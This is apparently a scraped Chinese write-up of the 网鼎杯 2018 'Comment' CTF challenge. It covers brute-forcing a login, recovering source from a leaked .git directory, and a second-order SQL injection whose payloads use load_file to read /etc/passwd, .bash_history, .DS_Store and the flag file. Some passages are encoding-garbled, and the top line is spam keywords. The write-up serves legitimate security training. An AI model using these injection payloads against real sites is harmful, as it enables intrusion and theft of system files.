国产无码综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

[網(wǎng)鼎杯 2018]Comment git泄露 / 恢復(fù) 二次注入 .DS_Store bash_history文件查看

2年前作者：雙層小牛堡分類：Toy博客閱讀(21)違法舉報(bào)

這篇具有很好參考價(jià)值的文章主要介紹了[網(wǎng)鼎杯 2018]Comment git泄露 / 恢復(fù) 二次注入 .DS_Store bash_history文件查看。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方，請(qǐng)大家不吝賜教，您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

首先我們看到賬號(hào)密碼有提示了

我們bp爆破一下

我首先對(duì)數(shù)字爆破因?yàn)槿址脑捥嗔?/p>

[網(wǎng)鼎杯 2018]Comment git泄露 / 恢復(fù) 二次注入 .DS_Store bash_history文件查看,BUUctf,git

爆出來了哦

所以賬號(hào)密碼也出來了

zhangwei
zhangwei666

[網(wǎng)鼎杯 2018]Comment git泄露 / 恢復(fù) 二次注入 .DS_Store bash_history文件查看,BUUctf,git

沒有什么用啊

掃一下吧

[網(wǎng)鼎杯 2018]Comment git泄露 / 恢復(fù) 二次注入 .DS_Store bash_history文件查看,BUUctf,git

有g(shù)it

git泄露

那泄露看看

[網(wǎng)鼎杯 2018]Comment git泄露 / 恢復(fù) 二次注入 .DS_Store bash_history文件查看,BUUctf,git

真有

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    break;
case 'comment':
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

原本的githack壞了

mirrors / BugScanTeam / GitHack · GitCode

重新下了一個(gè) 需要下載后里面存在 .git文件夾

然后看上面的代碼根本沒有看懂感覺不是全部

git 恢復(fù)

所以我們可以使用git log --all看看

以前的情況

[網(wǎng)鼎杯 2018]Comment git泄露 / 恢復(fù) 二次注入 .DS_Store bash_history文件查看,BUUctf,git

?我們直接回到最開始

git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

全部代碼就出來了

用了個(gè)switch 內(nèi)容為go

addslashes  這里是 通過轉(zhuǎn)義的方式 存入數(shù)據(jù)庫 很容易造成二次注入

因?yàn)闀?huì)把內(nèi)容原封不動(dòng)傳入數(shù)據(jù)庫 

如果讀取 就會(huì)造成二次注入

case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);

這里我們能發(fā)現(xiàn) 查詢的內(nèi)容 是 category


所以category 就是我們寫入的內(nèi)容的參數(shù)了

這里懂得差不多了

    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
主要是這里 設(shè)定了從數(shù)據(jù)庫提取出來的值

    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);


這里我們就可以構(gòu)造了

$category=0' content = database(),/*    后面的/*是用來和我們?cè)斍槔锩孑斎氲腸ontent閉合

我們首先寫入留言

0',content=database(),/*

[網(wǎng)鼎杯 2018]Comment git泄露 / 恢復(fù) 二次注入 .DS_Store bash_history文件查看,BUUctf,git

然后進(jìn)去提交留言

[網(wǎng)鼎杯 2018]Comment git泄露 / 恢復(fù) 二次注入 .DS_Store bash_history文件查看,BUUctf,git

這個(gè)時(shí)候就會(huì)形成

   $sql = "insert into comment
            set category = '0',content = database(),/*',
                content = '*/#',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);


更直觀點(diǎn)


   $sql = "insert into comment
            set category = '0',content = database(),/*',content = '*/#',
                bo_id = '$bo_id'";
 


/*',content = '*/#'


這里就為空了 所以現(xiàn)在的語句是

set category = '0',content = database(),
                bo_id = '$bo_id'";

[網(wǎng)鼎杯 2018]Comment git泄露 / 恢復(fù) 二次注入 .DS_Store bash_history文件查看,BUUctf,git

然后我們進(jìn)行查表發(fā)現(xiàn)沒有flag

于是我們可以看看user()函數(shù)

[網(wǎng)鼎杯 2018]Comment git泄露 / 恢復(fù) 二次注入 .DS_Store bash_history文件查看,BUUctf,git

發(fā)現(xiàn)是root權(quán)限

那么多半就是讀取了

load_file可以讀取

我們讀取看看

這里又是另一個(gè)文件讀取的方法了

之前做的題 proc這里沒有用

任意文件讀取

.bash_history??????

我們首先去查看 etc/passwd

0',content=(select load_file('/etc/passwd')),/*

[網(wǎng)鼎杯 2018]Comment git泄露 / 恢復(fù) 二次注入 .DS_Store bash_history文件查看,BUUctf,git

發(fā)現(xiàn)存在 www用戶我們?nèi)タ纯此臍v史命令

0',content=(select load_file('/home/www/.bash_history')),/*

[網(wǎng)鼎杯 2018]Comment git泄露 / 恢復(fù) 二次注入 .DS_Store bash_history文件查看,BUUctf,git

這里發(fā)現(xiàn)了是刪除了 .DS_Store

但是ctf環(huán)境一般都是docker環(huán)境所以在

/tmp/html下還會(huì)存在

我們?nèi)プx取

0',content=(select hex(load_file('/tmp/html/.DS_Store'))),/*


這里需要通過十六進(jìn)制輸出 因?yàn)闀?huì)有很多不可見的字符

?.DS_Store泄露

我們通過通過瑞士軍刀可以恢復(fù)成文件形式并且導(dǎo)出

然后通過 Python-dsstore-master

來實(shí)現(xiàn)解析讀取文件

py3 .\main.py .\samples\download.dat

[網(wǎng)鼎杯 2018]Comment git泄露 / 恢復(fù) 二次注入 .DS_Store bash_history文件查看,BUUctf,git

我們來解析讀取這個(gè)flag

0',content=(select load_file('/tmp/html/flag_8946e1ff1ee3e40f.php')),/*

[網(wǎng)鼎杯 2018]Comment git泄露 / 恢復(fù) 二次注入 .DS_Store bash_history文件查看,BUUctf,git

?但是這個(gè)文件是錯(cuò)誤的 flag為錯(cuò)誤

可能修改了所以我們回去 /var進(jìn)行讀取

0',content=(select load_file('/var/www/html/flag_8946e1ff1ee3e40f.php')),/*

flag{5737c889-1e5b-47a6-b14d-87df5dd59e01}

知識(shí)點(diǎn) 過多了。。。。。

雖然都很基礎(chǔ) 但是有的時(shí)候真沒想到可以以后再做一次文章來源地址http://www.zghlxwxcb.cn/news/detail-736565.html

到了這里，關(guān)于[網(wǎng)鼎杯 2018]Comment git泄露 / 恢復(fù) 二次注入 .DS_Store bash_history文件查看的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！

本文來自互聯(lián)網(wǎng)用戶投稿，該文觀點(diǎn)僅代表作者本人，不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù)，不擁有所有權(quán)，不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載，請(qǐng)注明出處：如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符，請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋，一經(jīng)查實(shí)，立即刪除！

分享到：

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

java反序列化-[網(wǎng)鼎杯 2020 朱雀組]Think Java——wp
這里使用IDEA打開可以看到這里使用了swagger進(jìn)行接口的測(cè)試，并且在 /common/test/sqlDict 路徑下發(fā)送了POST請(qǐng)求，請(qǐng)求參數(shù)為dbName 都是實(shí)體類，沒有什么重點(diǎn) 可以看到他是用于數(shù)據(jù)庫連接和查詢的，接受Test傳來的dbName值，并且已知一個(gè)數(shù)據(jù)庫myapp 此時(shí)可以對(duì) /common/test/sqlDict 路徑
2024年02月07日
瀏覽(18)
中國頂級(jí)CTF競(jìng)賽網(wǎng)絡(luò)安全大賽--2022網(wǎng)鼎杯re2解題思路
PEID查不出來，用了die，顯示是UPX3.96的殼，用了脫殼機(jī)，脫不了，只能手動(dòng)脫殼，拖入x64dbg，F(xiàn)9運(yùn)行到程序領(lǐng)空，很明顯的特征，push：無腦使用ESP定律大法，對(duì)ESP下硬件訪問斷點(diǎn)： F9運(yùn)行，在pop處停下： F4運(yùn)行到下面第一個(gè)jmp，F(xiàn)8，進(jìn)去又是一個(gè)jmp，繼續(xù)F8，到達(dá)OEP：使用x
2023年04月22日
瀏覽(21)
Jenkins 命令執(zhí)行 -- jetty 敏感信息泄露 --(CVE-2021-2816)&&(CVE-2017-1000353)&&(CVE-2018-1000861)
對(duì)于 = 9.4.40、= 10.0.2、= 11.0.2 的 Eclipse Jetty 版本，對(duì)帶有雙重編碼路徑的 ConcatServlet 的請(qǐng)求可以訪問 WEB-INF 目錄中的受保護(hù)資源。例如，對(duì) /concat?/%2557EB-INF/web.xml 的請(qǐng)求可以檢索 web.xml 文件。這可能會(huì)泄露有關(guān) Web 應(yīng)用程序?qū)嵤┑拿舾行畔ⅰ?直接在url路徑請(qǐng)求如下地址 Jenkin
2024年02月08日
瀏覽(28)
intellij idea 使用git的 cherry pick 摘取其他分支的comment
cherry pick 摘取其他分支的comment 如果想把 feature_v1.0 分支的comment 摘到 feature_v1.0_new 分支上，先切換到 feature_v1.0_new分支，這一步不能少了。然后點(diǎn)擊下面菜單欄的 git，點(diǎn)擊Local Changes旁邊的 Log，這時(shí)能看到 local和remote的分支，點(diǎn)擊feature_v1.0分支。從feature_v1.0，選中自己需要
2024年04月09日
瀏覽(103)
又一起數(shù)據(jù)泄露事件五個(gè)月內(nèi)的第二次
? 據(jù)報(bào)道，T-Mobile 在發(fā)現(xiàn)攻擊者從 2023 年 2 月下旬開始的一個(gè)多月內(nèi)訪問了數(shù)百名客戶的個(gè)人信息后，披露了 2023 年的第二次數(shù)據(jù)泄露事件。與之前報(bào)告的數(shù)據(jù)泄露事件（最近一次影響了 3700 萬人）相比，此次事件僅影響了 836 名客戶。? 然而，暴露的信息量非常大，使相關(guān)
2024年02月03日
瀏覽(21)
JeecgBootSql二次注入復(fù)現(xiàn)
版本為最新版本3.5.0 發(fā)布日期：2023-03-08 Poc地址： https://github.com/J0hnWalker/jeecg-boot-sqli 漏洞原理很簡單，但是由于個(gè)人配置的原因環(huán)境搭建很慢，下圖是搭建完成后的后臺(tái)主頁。當(dāng)然前端搭不搭建無所謂漏洞產(chǎn)生的地方來自于JeecgBoot后端的集成積木報(bào)表功能來看漏洞產(chǎn)生直接
2024年02月10日
瀏覽(11)
春秋云境：CVE-2022-26201（二次注入漏洞）
一、題目二、上傳權(quán)限馬三、蟻劍馬連接進(jìn)入題目： ?這個(gè)是和春秋云境：CVE-2022-28060一個(gè)網(wǎng)站，看來應(yīng)該是存在多個(gè)漏洞。點(diǎn)擊admin 不用登錄 ?Users ---- add users 選擇文件這里要是jpg圖片格式如果是php格式是無法運(yùn)行一句話木馬的普通的一句話木馬上傳在這個(gè)靶場(chǎng)是訪問
2023年04月21日
瀏覽(44)
CTFHub-Web-信息泄露-Git泄露
目錄一、Log 1、題目介紹 2、知識(shí)儲(chǔ)備 3、解題步驟（1）、查看頁面（2）、dirsearch掃描目錄（3）、Githack掃描 ?（4）、git log歷史查詢（5）、獲取flag 二、Stash 1、知識(shí)儲(chǔ)備： 2、githack掃描 3、獲取flag ?三、Index 1、知識(shí)儲(chǔ)備 2、dirsearch掃描 3、獲取flag ?四、個(gè)人感悟（1）、
2024年02月12日
瀏覽(23)
漏洞攻擊中怎么去做最全面覆蓋的sql注入漏洞攻擊？表信息是如何泄露的？預(yù)編譯就一定安全？最受歡迎的十款SQL注入工具配置及使用
漏洞攻擊中怎么去做最全面覆蓋的sql注入漏洞攻擊？表信息是如何泄露的？預(yù)編譯就一定安全？最受歡迎的十款SQL注入工具配置及使用。 SQL注入是因?yàn)楹笈_(tái)SQL語句拼接了用戶的輸入，而且Web應(yīng)用程序?qū)τ脩糨斎霐?shù)據(jù)的合法性沒有判斷和過濾，前端傳入后端的參數(shù)是攻擊者可控
2024年01月24日
瀏覽(25)
git源代碼泄露
需要的工具：kali，githack（win版沒下載成功）安裝方法: kali命令行中輸入:git clone https://github.com/lijiejie/GitHack 下載成功如下： ? 輸入GitHack，然后輸入python GitHack.py +所要下載的網(wǎng)頁鏈接+/.git/ GIT文件基本介紹： ????????Git 是目前最流行的版本控制系統(tǒng)。版本控制系統(tǒng)在一
2024年02月07日
瀏覽(101)